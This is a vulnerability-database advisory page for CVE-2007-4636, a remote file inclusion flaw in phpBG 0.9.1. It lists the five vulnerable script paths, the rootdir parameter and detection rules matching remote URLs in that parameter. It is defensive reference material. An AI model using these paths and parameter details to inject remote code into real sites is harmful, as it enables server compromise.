CVE-2007-4636
published 2007-08-31CVE-2007-4636: Multiple PHP remote file inclusion vulnerabilities in phpBG 0.9.1 allow remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter to…
PriorityP357high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.06%
99.3th percentile
Multiple PHP remote file inclusion vulnerabilities in phpBG 0.9.1 allow remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter to (1) intern/admin/other/backup.php, (2) intern/admin/, (3) intern/clan/member_add.php, (4) intern/config/key_2.php, or (5) intern/config/forum.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbg | phpbg | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP requests targeting phpBG scripts with a user-controlled `rootdir` parameter containing a remote URL (RFI pattern), particularly to the five known vulnerable paths. ↗
- →Flag GET requests where the `rootdir` query parameter value begins with `http://` or `https://` against any of the five vulnerable phpBG endpoints. ↗
- →The `admin=1` parameter accompanies the RFI payload specifically on the backup.php endpoint; include this in detection logic for that path. ↗
- ·The PoC uses a placeholder value ('Shell') for the rootdir parameter; in real attacks this would be replaced with a remote URL pointing to attacker-controlled PHP code. Detection rules should match on URL-like values (e.g., http://, https://, ftp://) in the rootdir parameter, not the literal string 'Shell'. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/38429http://osvdb.org/38430http://osvdb.org/38431http://osvdb.org/38432http://osvdb.org/38433http://www.securityfocus.com/bid/25486https://exchange.xforce.ibmcloud.com/vulnerabilities/36348https://www.exploit-db.com/exploits/4340http://osvdb.org/38429http://osvdb.org/38430http://osvdb.org/38431http://osvdb.org/38432http://osvdb.org/38433http://www.securityfocus.com/bid/25486https://exchange.xforce.ibmcloud.com/vulnerabilities/36348https://www.exploit-db.com/exploits/4340
2007-08-31
Published